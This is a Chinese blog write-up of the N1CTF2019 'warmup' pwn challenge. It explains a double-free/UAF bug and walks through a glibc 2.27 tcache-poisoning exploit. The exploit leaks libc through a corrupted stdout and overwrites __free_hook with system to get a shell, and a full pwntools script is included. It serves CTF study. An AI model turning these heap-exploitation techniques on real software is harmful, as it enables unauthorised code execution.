N1CTF2019——warmup WP

最新推荐文章于 2023-04-23 14:26:13 发布
最新推荐文章于 2023-04-23 14:26:13 发布
阅读量737 收藏
点赞数 1
分类专栏: 漏洞挖掘与利用 文章标签: N1CTF2019
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/102513493
版权

前言

  • 国内实力战队出的题目质量都非常高,我不敢想象这就是pwn的签到题。首先说一下这道题如何质量高。这道题涉及到了double free、UAF、tcache attack、IO_FILE的利用。赛后复现用去了我差不多3天的时间来钻研。

保护

在这里插入图片描述

分析

  • 程序只有增加、删除、编辑三个操作,并且保护全开,这种情况下只能利用IO_FILE来泄露内存。增加操作中已经限制了分配的大小:
    在这里插入图片描述
  • 漏洞有些隐蔽,首先看编辑函数:
    在这里插入图片描述
  • 这里先是将指针赋值给ptr变量,下面再来判断它的有效性。
    在这里插入图片描述
  • 删除函数中,如果输入的指针索引在0~9中,如果指针为空,它就会释放ptr指向的内存。那么,我们只要先编辑一个有效的指针,然后释放的时候,输入一个无效指针索引,实际上释放的还是编辑的那个指针,并且不会被置空,由此产生了double freeUAF

利用

  1. 因为分配的大小做了限制,所以我们不能直接分配得到unsortbin’s chunk,而题目给的libc是2.27的,我们可以利用tcache attack来分配一个overlaping chunk来修改邻接chunk’s head->size,使其变成unsortbin’s chunk,再释放8次使其进入unsortbin
  2. 部分修改刚释放的unsortbin’s chunkfd指向stdoutdouble free一个指针,利用UAF编辑这个指针的FD,指向刚释放的unsortbin’s chunk,然后分配两次第三次分配时候就可以编辑stdout泄露内存了。
  3. double free一个指针,编辑FD精确攻击free_hook释放三个没有释放的不重复的指针
  4. tcache attack free_hook

EXP

from pwn import*

#context.log_level=1
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
def Add(data):
    p.sendlineafter('>>','1')
    p.sendafter('>>',data)

def Del(idx):
    p.sendlineafter('>>','2')
    p.sendlineafter(':',str(idx))

def Edit(idx,data):
    p.sendlineafter('>>','3')
    p.sendlineafter(':',str(idx))
    p.sendafter('>>',data)

while True:
    try:
        p=process('./warmup')
        proc_base=p.libs()[os.path.abspath(os.path.join(os.getcwd(), './warmup'))]
        for i in range(5):#0~4
            Add(str(i+1)*8)
        Edit(4,'\n')
        for i in range(3):
            Del(9)#Del 4
        Del(4)
        Edit(0,'\0'*0x10+p64(0)+p64(0x51))
        Del(9)
        Del(0)
        Add('\x90')#0
        Add('\n')
        Add(p64(0)*5+p64(0xa1))#5
        Edit(1,'\n')
        for i in range(8):
            Del(9)#Del 1
        Edit(1,p16(0x1760))
        Del(0)
        Edit(5,'\n')
        Del(9)
        Edit(5,'\xc0')
        Add('\n')
        Add('\n')
        Add(p32(0xfbad1880)+'\0'*0x1c+'\x88')
        leak=p.recvuntil('done!')
        if len(leak)<8:
            raise EOFError
        libc_base=u64(leak[0:6].ljust(8,'\0'))-libc.sym['_IO_2_1_stdout_']-131
        success("libc_base:"+hex(libc_base))
        Del(0)
        Edit(5,'\n')
        Del(9)
        Edit(5,p64(libc_base+libc.sym['__free_hook']))
        Add('\n')
        Add(p64(libc_base+libc.sym['system']))
        Edit(0,'/bin/sh\0')
        Del(0)
        #gdb.attach(p,'x/10gx '+str(proc_base+0x202080)+'\nheap bins\nheap chunks')
        p.interactive()
        exit(0)
    except EOFError,e:
        p.close()

总结

  • 如何使用tcache attack构造overlaping chunk不难,难的是保证释放unsortbin chunk之后分配内存不会出错,为此我折腾了大约三天。究其原因还是因为之前构造overlaping chunk的时候不太合理。
  • 总的来说tcache attack比fastbin attack要好利用得多。具体说来,此题利用的是tcache attack中的tcache poisoning,与此类似的是fastbin attack中的Arbitrary Alloc。然而,后者需要绕过大小的检测,而前者不需要。但是注意到本EXP中在利用tcache attack构造overlaping chunk之前还伪造了chunk head,这并不与我刚说的“不需要绕过大小检测”这句话矛盾,而是为了后续分配其他chunk的时候不出错。
  • 更多的细节只可意会,不可言传,一切尽在调试中。。。
飞鸿踏雪(蓝屏选手)
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
N1CTF Junior 2024 Web Official Writeup(Nu1L Team组织的官方纳新赛事,旨在选拔优秀人才加入Nu1L Team
04-08 890
小北觉得这一次的N1 Junior的题大部分都有个共同性,就是二次思维,也就是单次Attack无法达到利用,那就double attack!!!自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
AeroCTF 2019 部分题目Writeup
iqiqiya的博客
03-27 1581
0x01: 【Forensic】undefined protocol 题目说明:We managed to get traffic from the machine of one of the hackers who hacked our navigation systems, but they use some kind of strange protocol over TCP. We wer...
[HCTF 2018]Warmup 详细wp
Leaf_initial的博客
04-23 256
例如 include_path 是 .,当前⼯作⽬录是 /www/,脚本中要 include ⼀个 include/a.php 并且在该⽂件中有⼀句 include “b.php”,则寻找 b.php 的顺序先是 /www/,然后是 /www/include/。最终的效果就是,将$page字符串中的URL路径部分提取出来,用于后续的处理和判断。即,当include后的文件找不到且有路径时,会沿此路径一直找,直到找到文件 即,当include后的文件找不到且有路径时,会沿此路径一直找,直到找到文件。
NCTF2019 -- PWN部分writeup
qq_41988448的博客
11-27 1247
easy_rop 链接:https://pan.baidu.com/s/1ohXfpbiIb3jjHpYtcuS9xA 提取码:lz3e 文件防护 反汇编 调试的时候发现main函数的rbp居然是pie,而返回地址下面第四行是main函数自己的头部指针 已知条件 存在栈溢出,大小为4个栈单元 开启了canary保护,可以用’+'号绕过 main函数的 rbp 为 pie(基址) main函...
buuctf pwn [rip] [warmup_csaw_2016 1] [ciscn_2019_n_1 1]
m0_62142241的博客
02-27 385
栈溢出 【以下这几题全是利用栈溢出来进行攻破】 相同步骤: 1.下载文件 2.启动靶机 3.打开Terminal(用nc打开端口,用ls打开目录及文件) 【nc的参数用法 -d 后台模式 -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -L 连
Nctf2019 pwn
doudoudedi
11-24 677
没啥好说的自己菜 就做了三个 hello_pwn 没啥好说了直接连 from pwn import * local=1 p=remote('139.129.76.65',50003) p.interactive() pwn me 100 years! (Ⅰ) 00截断然后直接覆盖 from pwn import * p=remote('139.129.76.65',50004) #p=proce...
2021 N1CTF CTF 真题.zip
12-07
2021 N1CTF CTF 真题
D^3CTF 2019 Challenges.zip
08-16
D^3CTF 2019 CTF
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
CTF——攻防世界第一篇
01-08
昨天下午看了关于ctf的视频,发现自己什么也不懂,明明每个字都是我认识的中文,但是组合到一起就不明白了。「我好难……」 而且,看视频我似乎没什么的耐性,一下午下来还是发现自己没学到什么。所以,今天,我决定...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
从入门到放弃系列之 N1CTF2018 pwn vote writeup
zhangji
03-12 653
N1CTF2018 pwn vote writeup 检查程序的安全防护情况 [*] '/home/zhangji16/c_study/vuln/n1ctf2018/pwn/vote/vote_patch Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled ...
【WhaleCTF逆向题】Warmup题目writeup
iqiqiya的博客
09-27 1476
题目信息: IDA直接载入   双击_main    图形视图直接向下拉一点就可以看到关键 直接F5看伪代码就可以 更关键的地方就是从46行开始    我是直接将一些不好看的标识符给改了  整个程序其实就是一个while循环将输入的每个字符与0xE进行异或 再与s_36_进行比对  看是否一致  若一致则成功 那么我们python来求解一下: (下面的s数组就是将s_...
CTFwarmup-文件包含
wcwdnmdnmd的博客
12-24 1126
CTF练习之warmup-文件包含初见 初见 打开以后就见到这样的页面直接F12看源代码 看到<!--source.php-->直接访问 看到白名单有两个地址,访问另一个hint.php 看到ffffllllaaaagggg 再分析source.php的代码 发现$_page处mb_strops($page . '?', '?')有点奇怪,查看函数定义。 发现该函数可被利用 https://www.cnblogs.com/leixiao-/p/10265150.html 知道该函
【打酱油】N1CTF部分WP
weixin_33895604的博客
03-12 184
周末围观神仙们打架,自己也做了几题,也是有所收获的,在这里记录一下。http://n1ctf.xctf.org.cn/ N1CTF.png 0x00 checkin 这是一道签到题 image.png image.png 加入IRC频道拿到base64,encode即可拿...
csaw-ctf warmup wp
ditto的博客
01-20 687
拿到题目检查防护: 64位程序,简单的栈溢出: 程序本身有cat flag 计算下溢出点: exp如下:
gyctf_2020_document(uaf)
m0_51251108的博客
11-14 988
gyctf_2020_document: 保护全开 漏洞分析: delete函数里指针未清零 大致思路: 这题限制了add时chunk的size,为0x8和0x80,edit时只能从+0x10处改0x70个字符 1.先add一个chunk,在add一个chunk,这个chunk里的name填/bin/sh\x00 (这时0x8chunk中存有指向binsh地址的指针了),我们释放第一个chunk,由于0x80大小,释放到unsortbin中,我们show,就能泄露libc 2.我们接下来的目的是控制申请
攻防世界(pwn)babyheap(一些常见的堆利用方法)
PLpa的博客
03-22 2003
前言: 此题攻击链路:null_off_by_one修改堆块信息 => UAF泄露libc基址和其他有用信息 => fastbin attack申请堆块到指定地址 => 利用realloc_hook来调整堆栈 => one_gadget get shell。 64位程序,保护全开。 程序提供增删查操作,没有改操作。由于题目已经给了libc-2.23文件(虽然给错了)说明...
2019UNCTF-竞技赛 部分WP
A_dmin的博客
10-30 2986
UNCTF-竞技赛 部分WP
[D3CTF 2019]EasyWeb
最新发布
07-28
综上所述,\[D3CTF 2019\]EasyWeb可能涉及到使用兼容低版本的Smarty引擎、按需加载的类导致pop链难以找到,以及通过绕过过滤条件来获取flag的方法。 #### 引用[.reference_title] - *1* *2* [d3ctf easyweb题解]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值